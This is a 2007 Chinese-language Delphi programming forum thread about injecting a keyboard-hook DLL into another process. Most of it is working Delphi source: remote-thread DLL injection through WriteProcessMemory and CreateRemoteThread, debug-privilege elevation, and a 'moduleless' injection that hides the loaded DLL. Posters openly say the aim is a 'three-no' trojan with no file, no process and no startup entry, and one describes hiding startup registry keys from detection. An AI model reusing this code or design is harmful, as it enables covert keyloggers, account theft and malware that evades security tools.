请问各位富翁把一个DLL注入某个进程后怎样运行它?(其中DLL是个键盘钩子) ( 积分: 200 )

ljmxy · 2007-02-05

请问各位富翁把一个DLL注入某个进程后怎样运行它?(其中DLL是个键盘钩子) DLL 用rundll32.exe xx.dll 是可以运行的.. 是不是DLL里用到了API所以运行不了或会出错啊?

Avalon · 2007-02-05

此帖留名 看楼下怎么说

zdwjetlee · 2007-02-05

ljmxy开始研究盗号程序了  我也想知道答案 关注中…… 顶啊顶啊

ljmxy · 2007-02-05

TO zdwjetlee 我没想过盗号啊.只是想学学..

ljmxy · 2007-02-05

奉上全部身价了,希望可以得到答案!

木桩 · 2007-02-05

如果Hook在DLLMain里，注入后LoadLibrary就可以了，如果是个函数或者过程，还要GetProcAddress DLL里的API都不用重定向的，所以你出错的地方肯定不是因为调用了API。 至于如何注射DLL，相信你已经看过很多文章了。这里就给段我以前写的，注射过程已经写成了函数-_-： //写目标进程 //比如AttachToProcess('notepad.exe', string(SystemDir)+'/'+'gencast.dll'); //或者AttachToProcess('', string(SystemDir)+'/'+'gencast.dll',strtoint(editProcessID.Text)); function AttachToProcess(const HostFile, GuestFile: string; const PID: DWORD = 0): DWORD; var   hRemoteProcess: THandle;   dwRemoteProcessId: DWORD;   cb: DWORD;   pszLibFileRemote: Pointer;   iReturnCode: Boolean;   TempVar: DWORD;   pfnStartAddr: TFNThreadStartRoutine;   pszLibAFilename: PwideChar; begin   Result := 0;   //分配 GuestFile 的Unicode存储空间 2 BYTE   //由于以null结尾，所以+1   Getmem(pszLibAFilename, Length(GuestFile) * 2 + 1);   //转化为 Unicode   StringToWideChar(GuestFile, pszLibAFilename, Length(GuestFile) * 2 + 1);   if PID > 0 then      dwRemoteProcessID := PID   else      FindAProcess(HostFile, False, dwRemoteProcessID);   Form1.Label1.Caption:=Form1.Label1.Caption+'pID: '+inttostr(dwRemoteProcessID);   //打开指定进程   hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + {允许远程创建线程}       PROCESS_VM_OPERATION + {允许远程VM操作}       PROCESS_VM_WRITE, {允许远程VM写}       FALSE, dwRemoteProcessId);   //计算存储Dll名要用的内存空间   cb := (1 + lstrlenW(pszLibAFilename)) * sizeof(WCHAR);   //用 VirtualAllocEx 分配存放用的缓冲区   pszLibFileRemote := PWIDESTRING(VirtualAllocEx(hRemoteProcess, nil, cb, MEM_COMMIT, PAGE_READWRITE));   TempVar := 0;   //WriteProcessMemory 将代码写到远程进程中   iReturnCode := WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibAFilename, cb, TempVar);   if iReturnCode then   begin     //查找 LoadLibraryW 的地址     pfnStartAddr := GetProcAddress(GetModuleHandle('Kernel32'), 'LoadLibraryW');     TempVar := 0;     //用 LoadLibraryW 调用代码     Result := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, TempVar);   end;   Freemem(pszLibAFilename); end; //查找指定进程，并返回pID procedure FindAProcess(const AFilename: string; const PathMatch: Boolean; var ProcessID: DWORD); var   lppe: TProcessEntry32;   SsHandle: Thandle;   FoundAProc, FoundOK: boolean; begin   ProcessID :=0;   SsHandle := CreateToolHelp32SnapShot(TH32CS_SnapProcess, 0);   FoundAProc := Process32First(Sshandle, lppe);   while FoundAProc do   begin     if PathMatch then       FoundOK := AnsiStricomp(lppe.szExefile, PChar(AFilename)) = 0     else       FoundOK := AnsiStricomp(PChar(ExtractFilename(lppe.szExefile)), PChar(ExtractFilename(AFilename))) = 0;     if FoundOK then     begin       ProcessID := lppe.th32ProcessID;       break;     end;     FoundAProc := Process32Next(SsHandle, lppe);   end;   CloseHandle(SsHandle); end; 再一个要注意的是，进程需要SeDebugPrivilege权限，才能读写目标进程的。提升权限用EnabledDebugPrivilege这个函数，一搜一把。

ljmxy · 2007-02-05

TO 木桩 跟我的一模一样,不过我的是抄别人的.可能作者就是你呀..哈哈.我先试试.行的话我就给分.谢谢 procedure FindAProcess(const AFilename:string; const PathMatch:Boolean; var ProcessID: DWORD); //AFilename为要查找（进程ID）的文件名（可以包行路径） //PathMatch为查找的时候是否匹配路径 var     lppe:TProcessEntry32;     SsHandle:Thandle;     FoundAProc, FoundOK:boolean; begin     SsHandle   := CreateToolHelp32SnapShot(TH32CS_SNAPALL,0);     FoundAProc := Process32First(Sshandle,lppe);     //枚举Process,然后判断是否是所要查找的Process     while FoundAProc do     begin         //根据PathMatch的值来决定匹配的方式         if PathMatch then            FoundOK:=AnsiStricomp(lppe.szExefile,PChar(AFilename))=0         else            FoundOK:=AnsiStricomp(PChar(ExtractFilename(lppe.szExefile)),PChar(ExtractFilename(AFilename)))=0;         if FoundOK then         begin             ProcessID:=lppe.th32ProcessID;             break;         end;         FoundAProc :=Process32Next(SsHandle,lppe);     end;     //  if not FoundAProc then showmessage(SysErrorMessage(GetLastError));     CloseHandle(SsHandle); end; //激活或者停止指定的权限 function EnabledDebugPrivilege(const bEnabled: Boolean):Boolean; var     hToken: THandle;     tp: TOKEN_PRIVILEGES;     a: DWORD; const     SE_DEBUG_NAME = 'SeDebugPrivilege'; begin     Result:=False;     //打开当前Process的令牌(我一直叫Token为令牌)     if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)) then     begin         //调整令牌的权限,也就是加上或者取消调试权限(SE_DEBUG_NAME)         tp.PrivilegeCount :=1;         LookupPrivilegeValue(nil,SE_DEBUG_NAME ,tp.Privileges[0].Luid);         if bEnabled then         begin             tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;         end         else         begin             tp.Privileges[0].Attributes := 0;         end;         a:=0;         AdjustTokenPrivileges(hToken,False,tp,SizeOf(tp),nil,a);         Result:= GetLastError = ERROR_SUCCESS;         CloseHandle(hToken);     end; end; //在指定的进程中插入一个DLL文件 function AttachToProcess(const HostFile, GuestFile : string;const PID

WORD=0)

WORD; //HostFile为要绑定的宿主文件(Exe文件)，GuestFile为要嵌入的客户文件(Dll文件) //如AttachToProcess('D:/TESTDLL.DLL','Notepad.exe') ; var     hRemoteProcess: THandle;     dwRemoteProcessId

WORD;     cb

WORD;     pszLibFileRemote: Pointer;     iReturnCode:Boolean;     TempVar

WORD;     pfnStartAddr:TFNThreadStartRoutine;     pszLibAFilename: PwideChar; begin     Result:=0;     //激活当前Process的SE_DEBUG_NAME权限,如果不激活的话,一些服务进程将无法     //打开     EnabledDebugPrivilege(True);     //给pszLibAFilename分配内存,为什么是Length(GuestFile)*2+1呢,因为咱们     //等一会儿,要调用函数LoadLibraryW,而LoadLibraryW函数需要的参数是WideChar型     Getmem(pszLibAFilename,Length(GuestFile)*2+1);     StringToWideChar(GuestFile,pszLibAFilename,Length(GuestFile)*2+1);     if PID>0 then     begin         dwRemoteProcessID:=PID;     end     else     begin         FindAProcess(HostFile,False,dwRemoteProcessID);     end;     //由于我们后面需要写入远程进程的内存地址空间并建立远程线程，所以需要申请     //足够的权限（PROCESS_CREATE_THREAD、VM_OPERATION、VM_WRITE）。     //然后，我们可以建立LoadLibraryW函数这个线程来启动我们的DLL，LoadLibraryW     //函数是在kernel32.dll中定义的，用来加载DLL文件，它只有一个参数，就是DLL     //文件的绝对路径名pszLibAFilename，（也就是DLL的全路径文件名），但是由于     //DLL是在远程进程内调用的，所以我们首先还需要将这个文件名复制到远程地址空     //间：（否则远程线程是无法读到这个参数的）     hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + //允许远程创建线程                                 PROCESS_VM_OPERATION+ //允许远程VM操作                                 PROCESS_VM_WRITE,//允许远程VM写                                 FALSE, dwRemoteProcessId);     //计算DLL路径名需要的内存空间     cb := (1 + lstrlenW(pszLibAFilename)) * sizeof(WCHAR);     //使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名缓冲区     pszLibFileRemote := PWideString( VirtualAllocEx( hRemoteProcess, nil, cb, MEM_COMMIT, PAGE_READWRITE));     //使用WriteProcessMemory函数将DLL的路径名复制到远程进程的内存空间     TempVar:=0;     iReturnCode := WriteProcessMemory(hRemoteProcess,pszLibFileRemote, pszLibAFilename, cb, TempVar);     if iReturnCode then     begin         //计算LoadLibraryW的入口地址         pfnStartAddr := GetProcAddress(GetModuleHandle('Kernel32'), 'LoadLibraryW');         //OK，万事俱备，我们通过建立远程线程时的地址pfnStartAddr（实际上就是LoadLibraryW         //的入口地址）和传递的参数  pszLibFileRemote（实际上是我们复制过去的DLL的全路         //径文件名）在远程进程内启动我们的DLL：         //启动远程线程LoadLibraryW，通过远程线程调用用户的DLL文件         TempVar:=0;         Result := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, TempVar);     end;     Freemem(pszLibAFilename); end;

木桩 · 2007-02-05

ps，这个也是我抄别人的，只是稍稍改了点东西——汗-_-！ 这东西已经没有意义了，现在注射DLL绝对不安全，对系统进程稍微熟悉一点的人，都能区分出最后那个DLL是木马来着。 所以我现在在研究那种无模块的DLL注射，也就是注射后看不到DLL名称。只是还没有到实际应用的程度...

木桩 · 2007-02-05

这个就是无模块DLL注射，放假刚写的（这回是原创） 原理是：载入DLL，将映射后数据移动到另一块区域，FreeLibrary，最后将DLL数据写回。 //---------------------- 阶段1 ---------------------- unit CopyMem_Main; interface uses   Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,   Dialogs, StdCtrls; type   TForm1 = class(TForm)     Button1: TButton;     Memo1: TMemo;     procedure Button1Click(Sender: TObject);     procedure FormCreate(Sender: TObject);   private     { Private declarations }     var       hLib: THandle;   public     { Public declarations }   end; var   Form1: TForm1; function EnabledDebugPrivilege(const bEnabled: Boolean): Boolean; implementation {$R *.dfm} procedure TForm1.Button1Click(Sender: TObject); type   TProc=procedure (); var   proc: TProc;   dllAddress, dllNewAddress, d_AllocAddr: Pointer;   dllSize: Int64;   hProcess: THandle;   TempVar:Cardinal; begin   hLib:=LoadLibrary('inProcs1.dll');   proc:=GetProcAddress(hLib, 'inJet');   asm     push eax     mov eax,proc            //函数名本身就是指针     and eax,$FFFF0000       //取DLL基址     mov dllAddress,eax     pop eax   end;   Memo1.Lines.Add(Format('DLL基址：%0.8x'#13#10'inJet地址：%0.8x',                         [Integer(dllAddress), Integer(@proc)]));   dllSize:=$1C000;      //映射后大小   Memo1.Lines.Add(Format('DLL大小：%x',[dllSize]));   //开始分配内存   hProcess:=OpenProcess(PROCESS_CREATE_THREAD + PROCESS_VM_OPERATION + PROCESS_VM_WRITE, FALSE, GetCurrentProcessId());     if hProcess<=0 then begin Memo1.Lines.Add('OpenProcess 失败。');Exit;end;   //复制到新申请的位置   d_AllocAddr:=VirtualAllocEx(hProcess, nil, dllSize, MEM_COMMIT or MEM_RESERVE, PAGE_READWRITE);   WriteProcessMemory(hProcess, d_AllocAddr, dllAddress, dllSize, TempVar);   Memo1.Lines.Add(format(#13#10'写入数据在: %0.8x - %0.8x',[integer(d_AllocAddr),integer(d_AllocAddr)+dllSize]));   //释放DLL   FreeLibrary(hLib);   Sleep(100);         //保证释放完成   //写回原来的位置   dllNewAddress:=VirtualAllocEx(hProcess, dllAddress, dllSize, MEM_COMMIT or MEM_RESERVE, PAGE_READWRITE);     if dllNewAddress<>dllAddress then begin Memo1.Lines.Add(format('错误号：%d'#13#10'分配数据空间失败！原始位置：%0.8x 现在位置：%0.8x',[GetLastError, integer(d_AllocAddr),integer(dllNewAddress)])); Exit; end;   TempVar:=0;   WriteProcessMemory(hProcess, dllAddress, d_AllocAddr, dllSize, TempVar);   Memo1.Lines.Add(format(#13#10'写回数据到 %0.8x 位置成功！',[Integer(dllNewAddress)]));   //执行目标过程   TempVar:=0;   CreateThread(nil, 0, @Proc, nil, 0, TempVar);   CloseHandle(hProcess); end; procedure TForm1.FormCreate(Sender: TObject); begin   EnabledDebugPrivilege(True); end; //提升权限 function EnabledDebugPrivilege(const bEnabled: Boolean): Boolean; var   hToken: THandle;   tp: TOKEN_PRIVILEGES;   a: DWORD; const   SE_DEBUG_NAME = 'SeDebugPrivilege'; begin   Result := False;   if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)) then   begin     tp.PrivilegeCount := 1;     LookupPrivilegeValue(nil, SE_DEBUG_NAME, tp.Privileges[0].Luid);     if bEnabled then       tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED     else       tp.Privileges[0].Attributes := 0;     a := 0;     AdjustTokenPrivileges(hToken, False, tp, SizeOf(tp), nil, a);     Result := GetLastError = ERROR_SUCCESS;     CloseHandle(hToken);   end; end; end.

木桩 · 2007-02-05

//DLL模块内容 library inProcs1; uses   SysUtils,   Windows,   Classes; {$R *.res} //{$IMAGEBASE $02000000} procedure inJet(); begin   While MessageBox(0, '成功了！现在退出？', 'Form DLL', MB_YESNO)<>idYes do     Sleep(2000);   ExitThread(0); //退出线程，否则后面的ret不知道会跳向何处   //千万不要用 Halt(0); 这是我N次重启换来血的教训 end; exports   inJet; begin end. 最初的设想是这样的： 测试阶段1：(已实现) 1.载入DLL 2.复制DLL到目标区域 3.卸载DLL 4.申请原DLL的空间，并将暂存的数据写回 5.执行DLL中目标函数 测试阶段2： 1.载入DLL 2.复制DLL到目标区域，修改写回进程偏移量 3.调用"写回进程" 阶段3 完整的DLL： 1.复制DLL自身到目标任意内存区域 2.在新开辟的内存区里执行"写回进程" 3.退出DLL "写回进程"（将DLL写回原来位置）: 1.等待几秒，以便DLL被释放 2.申请原DLL的空间，并将暂存的数据写回 3.执行目的过程 4.自己退出（Halt(0);） 这个设想是为了实现“三无木马”（无文件、无进程、无启动项），灵感来自于ByShell。 研究成功的话，传统的DLL注射就可以抛弃了！

网中戏 · 2007-02-05

好好看看回调函数

我爱PASCAL · 2007-02-05

请问一下二无木马怎么做？ 无进程、无启动项就行了。 我有用处，但不是搞破坏。

木桩 · 2007-02-05

差不多就是我上两层贴的那段代码，外部载入一个DLL，然后无模块的运行DLL中inJet过程。 原理是：载入DLL，将映射后数据移动到另一块区域，FreeLibrary，最后将DLL数据写回。 //---------------------- 阶段1 ---------------------- unit CopyMem_Main; .... 你直接复制到Delphi里，试试就明白了，原理很简单的。 把GetCurrentProcessId()改成你要注射的进程ID，然后将CreateThread(nil,改成CreateRemoteThread(hProcess, nil, 就能对其它进程使用了。 至于如何无启动项，至少现在只能是程序运行时删除注册表键值，关机前写回（截获WM_QUERYENDSESSION消息）。只是这样做和ByShell里提到的一样，一旦机器断电或者强行拉掉电源，这木马就死了个彻彻底底... PS:我也不是搞破坏啦，只是看了ByShell的源码，想用Delphi实现而已。 再PS:如果把无启动项也解决了，那岂不是开创木马技术的新纪元？真正的杀不掉，还带自动复活...

ljmxy · 2007-02-05

多人接受答案了。

ljmxy · 2007-02-09

TO 木桩 那个无模块的例子动行的时候好像会出错啊.

木桩 · 2007-02-09

对自身程序没问题，我是在SP2+Delphi2006下编译的。 不过要是想应用到实际之中，就需要一定改变了，诸如API重定向等... 我的设想是通过一个跳板DLL，载入并映射目标，但是现在还是有点问题啦。

ljmxy · 2007-02-10

可能是我水平问题. 5.执行DLL中目标函数 时没反应.之后就出错. 我再领悟一下.谢谢你的关注!

木桩 · 2007-02-14

你在执行目标函数前，先检查一下写入的数据是否正确(用WinHex之类的查看目标进程的写入区域) 再一个可能是CreateRemoteThread的问题，按我的第二个思路，总是无法实现API的正常返回。 要是还没检查出错误，留下你的Email，我把新写的 DLL无模块注射 发给你， 虽然这个程序还有不少问题，比如DLL基址不能被目标进程使用，以及需要外部程序配合才能完成注射（我本来想的是依靠1-2个DLL自动完成的），但基本功能已经实现了。 其实也算投机取巧，先在自己程序里LoadLibrary，然后把映射后内容整个注射到目标进程。所以限制了DLL基址的位置。

ljmxy · 2007-02-14

我的EMAIL: ljmzw@hotmail.com 谢谢你耐心的指导,让我学到了好多东西.谢谢啦..

木桩 · 2007-02-15

发过去了，附件里只有源码，你重新编译一下。 邮件发送成功！ 邮件已通过卡巴斯基杀毒引擎扫描，并保存到“已发送”文件夹 您已经成功将信发送到:  ljmzw@hotmail.com 点击此处将收信人保存到通讯录

请问各位富翁把一个DLL注入某个进程后怎样运行它?(其中DLL是个键盘钩子) ( 积分: 200 )

ljmxy

Unregistered / Unconfirmed

Avalon

Unregistered / Unconfirmed

zdwjetlee

Unregistered / Unconfirmed

ljmxy

Unregistered / Unconfirmed

ljmxy

Unregistered / Unconfirmed

木桩

Unregistered / Unconfirmed

ljmxy

Unregistered / Unconfirmed

木桩

Unregistered / Unconfirmed

木桩

Unregistered / Unconfirmed

木桩

Unregistered / Unconfirmed

网中戏

Unregistered / Unconfirmed

我爱PASCAL

Unregistered / Unconfirmed

木桩

Unregistered / Unconfirmed

ljmxy

Unregistered / Unconfirmed

ljmxy

Unregistered / Unconfirmed

木桩

Unregistered / Unconfirmed

ljmxy

Unregistered / Unconfirmed

木桩

Unregistered / Unconfirmed

ljmxy

Unregistered / Unconfirmed

木桩

Unregistered / Unconfirmed

Similar threads